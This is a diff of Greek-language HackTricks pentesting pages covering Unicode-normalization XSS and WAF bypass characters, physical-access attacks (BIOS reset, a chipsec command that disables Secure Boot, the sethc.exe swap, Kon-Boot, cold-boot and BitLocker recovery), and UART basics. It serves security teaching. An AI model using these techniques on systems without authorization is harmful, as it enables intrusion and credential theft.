||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (699).png>)
|
||||
|
||||
**Ορισμένοι ενδιαφέροντες χαρακτήρες Unicode**
|
||||
**Μερικοί ενδιαφέροντες χαρακτήρες Unicode**
|
||||
|
||||
* `o` -- %e1%b4%bc
|
||||
* `r` -- %e1%b4%bf
|
||||
|
@ -91,36 +105,48 @@ unicodedata.normalize("NFKD","chloe\u0301") == unicodedata.normalize("NFKD", "ch
|
|||
|
||||
### XSS (Cross Site Scripting)
|
||||
|
||||
Μπορείτε να χρησιμοποιήσετε έναν από τους παρακάτω χαρακτήρες για να εξαπατήσετε την εφαρμογή ιστού και να εκμεταλλευτείτε μια ευπάθεια XSS:
|
||||
Μπορείτε να χρησιμοποιήσετε έναν από τους παρακάτω χαρακτήρες για να εξαπατήσετε την εφαρμογή web και να εκμεταλλευτείτε ένα XSS:
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (1).png>)
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (312) (2).png>)
|
||||
|
||||
Παρατηρήστε ότι, για παράδειγμα, ο πρώτος προτεινόμενος Unicode χαρακτήρας μπορεί να αποσταλεί ως: `%e2%89%ae` ή ως `%u226e`
|
||||
Σημειώστε ότι, για παράδειγμα, ο πρώτος Unicode χαρακτήρας που προτείνεται μπορεί να σταλεί ως: `%e2%89%ae` ή ως `%u226e`
|
||||
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1).png>)
|
||||
![https://appcheck-ng.com/unicode-normalization-vulnerabilities-the-special-k-polyglot/](<../../.gitbook/assets/image (215) (1) (1).png>)
|
||||
|
||||
### Fuzzing Regexes
|
||||
|
||||
Όταν το **backend ελέγχει την είσοδο του χρήστη με ένα regex**, είναι πιθανό να γίνεται **κανονικοποίηση** της **εισόδου** για το **regex** αλλά όχι για το σημείο όπου χρησιμοποιείται. Για παράδειγμα, σε ένα Open Redirect ή SSRF το regex μπορεί να κανονικοποιεί το απεσταλμένο URL αλλά στη συνέχεια να το προσπελαύνει ως έχει.
|
||||
|
||||
Το εργαλείο [**recollapse**](https://github.com/0xacb/recollapse) επιτρέπει να **δημιουργήσετε παραλλαγές της εισόδου** για να εκτελέσετε fuzzing στο backend. Για περισσότερες πληροφορίες, ελέγξτε το **github** και αυτήν την [**ανάρτηση**](https://0xacb.com/2022/11/21/recollapse/).
|
||||
Όταν το backend ελέγχει την είσοδο του χρήστη με ένα regex, είναι πιθανό ότι η είσοδος να είναι κανονικοποιημένη για το regex αλλά όχι για το πού χρησιμοποιείται. Για παράδειγμα, σε ένα Open Redirect ή SSRF το regex ενδέχεται να κανονικοποιεί το σταλθέν URL αλλά στη συνέχεια να το προσπερνά όπως είναι.
|
||||
|
||||
Το εργαλείο [**recollapse**](https://github.com/0xacb/recollapse) επιτρέπει τη δημιουργία παραλλαγών της εισόδου για να δοκιμάσετε το backend. Για περισσότερες πληροφορίες ελέγξτε το github και αυτήν την [**ανάρτηση**](https://0xacb.com/2022/11/21/recollapse/).
|
||||
|
||||
## Αναφορές
|
||||
|
||||
* [**https://labs.spotify.com/2013/06/18/creative-usernames/**](https://labs.spotify.com/2013/06/18/creative-usernames/)
|
||||
* [**https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work**](https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)
|
||||
* [**https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html**](https://jlajara.gitlab.io/posts/2020/02/19/Bypass\_WAF\_Unicode.html)
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το dark web και προσφέρει δωρεάν λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν πληγεί από κλοπή πληροφοριών από κλέφτες.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το hacking του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την εταιρεία σας να διαφημίζεται στο HackTricks ή να κατεβάσετε το HackTricks σε PDF, ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας για το hacking υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο github.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,36 +2,76 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε να χακάρετε το AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Συμμετάσχετε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα χάκερ σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο βασικός στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Ανάκτηση Κωδικού Πρόσβασης BIOS και Ασφάλεια Συστήματος
|
||||
|
||||
Η **επαναφορά του BIOS** μπορεί να επιτευχθεί με διάφορους τρόπους. Οι περισσότερες μητρικές πλακέτες περιλαμβάνουν μια **μπαταρία** που, όταν αφαιρεθεί για περίπου **30 λεπτά**, θα επαναφέρει τις ρυθμίσεις του BIOS, συμπεριλαμβανομένου του κωδικού πρόσβασης. Εναλλακτικά, μπορεί να προσαρμοστεί ένας **διακόπτης στη μητρική πλακέτα** για την επαναφορά αυτών των ρυθμίσεων συνδέοντας συγκεκριμένα ακροδέκτες.
|
||||
Η **επαναφορά του BIOS** μπορεί να επιτευχθεί με διάφορους τρόπους. Τα περισσότερα μητρικά περιλαμβάνουν μια **μπαταρία** που, όταν αφαιρεθεί για περίπου **30 λεπτά**, θα επαναφέρει τις ρυθμίσεις του BIOS, συμπεριλαμβανομένου του κωδικού πρόσβασης. Εναλλακτικά, ένα **jumper στη μητρική πλακέτα** μπορεί να ρυθμιστεί για να επαναφέρει αυτές τις ρυθμίσεις συνδέοντας συγκεκριμένα ακροδέκτες.
|
||||
|
||||
Σε περιπτώσεις όπου οι προσαρμογές υλικού δεν είναι δυνατές ή πρακτικές, τα **εργαλεία λογισμικού** προσφέρουν μια λύση. Η εκτέλεση ενός συστήματος από ένα **Live CD/USB** με διανομές όπως το **Kali Linux** παρέχει πρόσβαση σε εργαλεία όπως το **_killCmos_** και το **_CmosPWD_**, τα οποία μπορούν να βοηθήσουν στην ανάκτηση του κωδικού πρόσβασης του BIOS.
|
||||
Για καταστάσεις όπου οι ρυθμίσεις υλικού δεν είναι δυνατές ή πρακτικές, τα **εργαλεία λογισμικού** προσφέρουν μια λύση. Η εκτέλεση ενός συστήματος από ένα **Live CD/USB** με διανομές όπως το **Kali Linux** παρέχει πρόσβαση σε εργαλεία όπως το **_killCmos_** και το **_CmosPWD_**, τα οποία μπορούν να βοηθήσουν στην ανάκτηση κωδικού πρόσβασης BIOS.
|
||||
|
||||
Σε περιπτώσεις όπου ο κωδικός πρόσβασης του BIOS είναι άγνωστος, η εισαγωγή του λανθασμένα **τρεις φορές** συνήθως θα οδηγήσει σε έναν κωδικό σφάλματος. Αυτός ο κωδικός μπορεί να χρησιμοποιηθεί σε ιστότοπους όπως το [https://bios-pw.org](https://bios-pw.org) για την πιθανή ανάκτηση ενός χρησιμοποιήσιμου κωδικού πρόσβασης.
|
||||
Σε περιπτώσεις όπου ο κωδικός πρόσβασης BIOS είναι άγνωστος, η εισαγωγή του εσφαλμένα **τρεις φορές** συνήθως θα οδηγήσει σε έναν κωδικό σφάλματος. Αυτός ο κωδικός μπορεί να χρησιμοποιηθεί σε ιστότοπους όπως το [https://bios-pw.org](https://bios-pw.org) για την πιθανή ανάκτηση ενός χρήσιμου κωδικού πρόσβασης.
|
||||
|
||||
### Ασφάλεια UEFI
|
||||
|
||||
Για σύγχρονα συστήματα που χρησιμοποιούν το **UEFI** αντί για το παραδοσιακό BIOS, το εργαλείο **chipsec** μπορεί να χρησιμοποιηθεί για την ανάλυση και την τροποποίηση των ρυθμίσεων του UEFI, συμπεριλαμβανομένης της απενεργοποίησης του **Secure Boot**. Αυτό μπορεί να επιτευχθεί με την ακόλουθη εντολή:
|
||||
Για μοντέρνα συστήματα που χρησιμοποιούν **UEFI** αντί για το παραδοσιακό BIOS, το εργαλείο **chipsec** μπορεί να χρησιμοποιηθεί για να αναλύσει και να τροποποιήσει τις ρυθμίσεις UEFI, συμπεριλαμβανομένης της απενεργοποίησης του **Secure Boot**. Αυτό μπορεί να επιτευχθεί με την ακόλουθη εντολή:
|
||||
|
||||
`python chipsec_main.py -module exploits.secure.boot.pk`
|
||||
|
||||
### Ανάλυση RAM και Επιθέσεις Cold Boot
|
||||
|
||||
Η RAM διατηρεί τα δεδομένα για μικρό χρονικό διάστημα μετά τη διακοπή της τροφοδοσίας, συνήθως για **1 έως 2 λεπτά**. Αυτή η διάρκεια μπορεί να επεκταθεί σε **10 λεπτά** εφαρμόζοντας κρύες ουσίες, όπως υγρό αζωτού. Κατά τη διάρκεια αυτής της επεκταμένης περιόδου, μπορεί να δημιουργηθεί ένα **αντίγραφο μνήμης** χρησιμοποιώντας εργαλεία όπως το **dd.exe** και το **volatility** για ανάλυση.
|
||||
Η RAM διατηρεί δεδομένα προσωρινά μετά τη διακοπή της τροφοδοσίας, συνήθως για **1 έως 2 λεπτά**. Αυτή η διατήρηση μπορεί να επεκταθεί σε **10 λεπτά** εφαρμόζοντας κρύες ουσίες, όπως το υγρό αζώτιο. Κατά τη διάρκεια αυτής της επεκτεινόμενης περιόδου, μπορεί να δημιουργηθεί ένα **ανάκτηση μνήμης** χρησιμοποιώντας εργαλεία όπως το **dd.exe** και το **volatility** για ανάλυση.
|
||||
|
||||
### Επιθέσεις Άμεσης Πρόσβασης στη Μνήμη (DMA)
|
||||
### Επιθέσεις Direct Memory Access (DMA)
|
||||
|
||||
Το **INCEPTION** είναι ένα εργαλείο που σχεδιάστηκε για τη **φυσική παρέμβαση στη μνήμη** μέσω DMA, συμβατό με διεπαφές όπως **FireWire** και **Thunderbolt**. Επιτρέπει την παράκαμψη των διαδικασιών σύνδεσης συνδέσμου με την τροποποίηση της μνήμης για να αποδεχθεί οποιονδήποτε κωδικό πρόσβασης. Ωστόσο, δεν είναι αποτελεσματικό ενάντια σε συστήματα **Windows 10
|
||||
Το **INCEPTION** είναι ένα εργαλείο σχεδιασμένο για τη **φυσική διαχείριση μνήμης** μέσω DMA, συμβατό με διεπαφές όπως **FireWire** και **Thunderbolt**. Επιτρέπει την παράκαμψη των διαδικασιών σύνδεσης εισόδου πατώντας τη μνήμη για να αποδεχτεί οποιονδήποτε κωδικό πρόσβασης. Ωστόσο, δεν είναι αποτελεσματικό ενάντια σε συστήματα **Windows 10**.
|
||||
|
||||
### Live CD/USB για Πρόσβαση στο Σύστημα
|
||||
|
||||
Η αλλαγή δυαδικών συστήματος όπως το **_sethc.exe_** ή το **_Utilman.exe_** με ένα αντίγραφο του **_cmd.exe_** μπορεί να παρέχει ένα παράθυρο εντολών με δικαιώματα συστήματος. Εργαλεία όπως το **chntpw** μπορούν να χρησιμοποιηθούν για την επεξεργασία του αρχείου **SAM** μιας εγκατάστασης Windows, επιτρέποντας αλλαγές κωδικού πρόσβασης.
|
||||
|
||||
Το **Kon-Boot** είναι ένα εργαλείο που διευκολύνει τη σύνδεση σε συστήματα Windows χωρίς να γνωρίζετε τον κωδικό πρόσβασης με την προσωρινή τροποποίηση του πυρήνα Windows ή του UEFI. Περισσότερες πληροφορίες μπορούν να βρεθούν στο [https://www.raymond.cc](https://www.raymond.cc/blog/login-to-windows-administrator-and-linux-root-account-without-knowing-or-changing-current-password/).
|
||||
|
||||
### Χειρισμός Χαρακτηριστικών Ασφαλείας Windows
|
||||
|
||||
#### Συντομεύσεις Εκκίνησης και Ανάκτησης
|
||||
|
||||
- **Supr**: Πρόσβαση στις ρυθμίσεις του BIOS.
|
||||
- **F8**: Εισαγωγή στη λειτουργία Ανάκτησης.
|
||||
- Πατώντας το **Shift** μετά το banner των Windows μπορεί να παρακάμψει την αυτόματη σύνδεση.
|
||||
|
||||
#### Συσκευές BAD USB
|
||||
|
||||
Συσκευές όπως το **Rubber Ducky** και το **Teensyduino** λειτουργούν ως πλατφόρμες για τη δημιουργία συσκευών **κακών USB**, ικανών να εκτελούν προκαθορισμένα φορτία όταν συνδέονται σε έναν υπολογιστή-στόχο.
|
||||
|
||||
#### Αντίγραφο Σκιών Όγκου
|
||||
|
||||
Οι διαχειριστικά δικαιώματα επιτρέπουν τη δημιουργία αντιγράφων ευαίσθητων αρχείων, συμπεριλαμβανομένου του αρχείου **SAM**, μέσω του PowerShell.
|
||||
|
||||
### Παράκαμψη Κρυπτογράφησης BitLocker
|
||||
|
||||
Η κρυπτογράφηση BitLocker μπορεί ενδεχομένως να παρακαμφθεί αν ο **κωδικός ανάκτησης** βρεθεί μέσα σε ένα αρχείο ανάκτησης μνήμης (**MEMORY.DMP**). Εργαλεία όπως το **Elcomsoft Forensic Disk Decryptor** ή το **Passware Kit Forensic** μπορούν να χρη
|
||||
|
|
|
@ -2,52 +2,62 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Ερυθρού Συνεργείου AWS του HackTricks)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα τηλεγράφημα**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κλοπή πληροφοριών.
|
||||
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
## Βασικές Πληροφορίες
|
||||
|
||||
Το UART είναι ένας σειριακός πρωτόκολλο, που σημαίνει ότι μεταφέρει δεδομένα μεταξύ συστατικών ένα bit τη φορά. Αντίθετα, τα παράλληλα πρωτόκολλα επικοινωνίας μεταφέρουν δεδομένα ταυτόχρονα μέσω πολλαπλών καναλιών. Συνήθη σειριακά πρωτόκολλα περιλαμβάνουν τα RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express και USB.
|
||||
Το UART είναι ένα σειριακό πρωτόκολλο, που σημαίνει ότι μεταφέρει δεδομένα μεταξύ στοιχείων ένα bit τη φορά. Αντίθετα, τα παράλληλα πρωτόκολλα επικοινωνίας μεταδίδουν δεδομένα ταυτόχρονα μέσω πολλαπλών καναλιών. Συνήθη σειριακά πρωτόκολλα περιλαμβάνουν τα RS-232, I2C, SPI, CAN, Ethernet, HDMI, PCI Express και USB.
|
||||
|
||||
Γενικά, η γραμμή διατηρείται ψηλά (σε λογική τιμή 1) ενώ το UART βρίσκεται σε κατάσταση αδράνειας. Στη συνέχεια, για να σηματοδοτήσει την έναρξη μεταφοράς δεδομένων, ο αποστολέας στέλνει ένα bit εκκίνησης στον παραλήπτη, κατά το οποίο η σήμανση διατηρείται χαμηλά (σε λογική τιμή 0). Στη συνέχεια, ο αποστολέας στέλνει πέντε έως οκτώ bits δεδομένων που περιέχουν το πραγματικό μήνυμα, ακολουθούμενα από ένα προαιρετικό bit ελέγχου περιττότητας και ένα ή δύο bits σταματημένου (με λογική τιμή 1), ανάλογα με τη διαμόρφωση. Το bit ελέγχου περιττότητας, που χρησιμοποιείται για έλεγχο σφαλμάτων, σπάνια βλέπεται στην πράξη. Το bit (ή τα bits) σταματημένου σημαίνουν το τέλος της μετάδοσης.
|
||||
Γενικά, η γραμμή διατηρείται ψηλά (σε λογική τιμή 1) ενώ το UART βρίσκεται σε κατάσταση αδράνειας. Στη συνέχεια, για να σηματοδοτήσει την έναρξη μεταφοράς δεδομένων, ο αποστολέας στέλνει ένα bit εκκίνησης στον παραλήπτη, κατά το οποίο η σήμανση διατηρείται χαμηλά (σε λογική τιμή 0). Στη συνέχεια, ο αποστολέας στέλνει πέντε έως οκτώ bits δεδομένων που περιέχουν το πραγματικό μήνυμα, ακολουθούμενα από ένα προαιρετικό bit ελέγχου περιττότητας και ένα ή δύο bits σταματημένου (με λογική τιμή 1), ανάλογα με τη διαμόρφωση. Το bit περιττότητας, που χρησιμοποιείται για έλεγχο σφαλμάτων, σπάνια βλέπεται στην πράξη. Τα bits σταματημένου (ή bits) σηματοδοτούν το τέλος της μετάδοσης.
|
||||
|
||||
Αποκαλούμε την πιο συνηθισμένη διαμόρφωση 8N1: οκτώ bits δεδομένων, χωρίς bit ελέγχου περιττότητας και ένα bit σταματημένου. Για παράδειγμα, αν θέλαμε να στείλουμε τον χαρακτήρα C, ή το 0x43 σε ASCII, σε μια διαμόρφωση UART 8N1, θα στέλναμε τα ακόλουθα bits: 0 (το bit εκκίνησης); 0, 1, 0, 0, 0, 0, 1, 1 (η τιμή του 0x43 σε δυαδική μορφή), και 0 (το bit σταματημένου).
|
||||
Αποκαλούμε την πιο συνηθισμένη διαμόρφωση 8N1: οκτώ bits δεδομένων, χωρίς περιττότητα και ένα bit σταματημένου. Για παράδειγμα, αν θέλαμε να στείλουμε τον χαρακτήρα C, ή 0x43 σε ASCII, σε μια διαμόρφωση UART 8N1, θα στέλναμε τα ακόλουθα bits: 0 (το bit εκκίνησης); 0, 1, 0, 0, 0, 0, 1, 1 (η τιμή του 0x43 σε δυαδική μορφή), και 0 (το bit σταματημένου).
|
||||
|
||||
![](<../../.gitbook/assets/image (761).png>)
|
||||
|
||||
Εργαλεία υλικού για επικοινωνία με το UART:
|
||||
|
||||
* Προσαρμογέας USB-to-serial
|
||||
* Προσαρμογέας με τα chips CP2102 ή PL2303
|
||||
* Προσαρμογείς με τα chips CP2102 ή PL2303
|
||||
* Πολυεργαλείο όπως: Bus Pirate, το Adafruit FT232H, το Shikra, ή το Attify Badge
|
||||
|
||||
### Αναγνώριση Θυρών UART
|
||||
|
||||
Το UART έχει 4 θύρες: **TX**(Μετάδοση), **RX**(Λήψη), **Vcc**(Τάση), και **GND**(Γη). Μπορείτε να βρείτε 4 θύρες με τα γράμματα **`TX`** και **`RX`** **γραμμένα** στο PCB. Αν όμως δεν υπάρχει καμία ένδειξη, μπορεί να χρειαστεί να προσπαθήσετε να τις βρείτε μόνοι σας χρησιμοποιώντας ένα **πολύμετρο** ή ένα **λογικό αναλυτή**.
|
||||
Το UART έχει 4 θύρες: **TX**(Μετάδοση), **RX**(Λήψη), **Vcc**(Τάση), και **GND**(Γη). Μπορείτε να βρείτε 4 θύρες με τα γράμματα **`TX`** και **`RX`** **γραμμένα** στο PCB. Αν όμως δεν υπάρχει καμία ένδειξη, μπορεί να χρειαστεί να προσπαθήσετε να τις βρείτε μόνοι σας χρησιμοποιώντας ένα **πολύμετρο** ή ένα **αναλυτή λογικής**.
|
||||
|
||||
Με ένα **πολύμετρο** και τη συσκευή απενεργοποιημένη:
|
||||
|
||||
* Για να αναγνωρίσετε την **GND** ακίδα χρησιμοποιήστε τη λειτουργία **Συνέχειας Δοκιμής**, τοποθετήστε την πίσω ακίδα στη γη και δοκιμάστε με την κόκκινη μέχρι να ακούσετε ήχο από το πολύμετρο. Μπορεί να βρείτε πολλές ακίδες GND στο PCB, οπότε είτε έχετε βρει είτε όχι αυτή που ανήκει στο UART.
|
||||
* Για να αναγνωρίσετε τη θύρα **VCC**, ρυθμίστε τη λειτουργία **DC τάσης** και ρυθμίστε την σε έως 20 V τάση. Μαύρη μεταλλική ακίδα στη γη και κόκκινη ακίδα στην ακίδα. Ενεργοποιήστε τη συσκευή. Αν το πολύμετρο μετρά μια σταθερή τάση είτε 3,3 V είτε 5 V, έχετε βρει την ακίδα Vcc. Αν λάβετε άλλες τάσεις, δοκιμάστε με άλλες θύρες.
|
||||
* Για να αναγνωρίσετε τη θύρα **TX**, **λειτουργία DC τάσης** έως 20 V τάση, μαύρη ακίδα στη γη, κόκκινη ακίδα στην ακίδα, και ενεργοποιήστε τη συσκευή. Αν βρείτε ότι η τάση διακυμαίνεται για λίγα δευτερόλεπτα και στη συνέχεια σταθεροποιείται στην τιμή της Vcc, πιθανότατα έχετε βρει τη θύρα TX. Αυτό συμβαίνει επειδή κατά την ενεργοποίηση, στέλνει κάποια δεδομένα εντοπισμού σφαλμάτων.
|
||||
* Για να αναγνωρίσετε τη θύρα **VCC**, ορίστε τη λειτουργία **DC τάσης** και ρυθμίστε την σε έως 20 V τάση. Μαύρη στήλη στη γη και κόκκινη στην ακίδα. Ενεργοποιήστε τη συσκευή. Αν το πολύμετρο μετρά μια σταθερή τάση είτε 3,3 V είτε 5 V, έχετε βρει την ακίδα Vcc. Αν λάβετε άλλες τάσεις, δοκιμάστε με άλλες θύρες.
|
||||
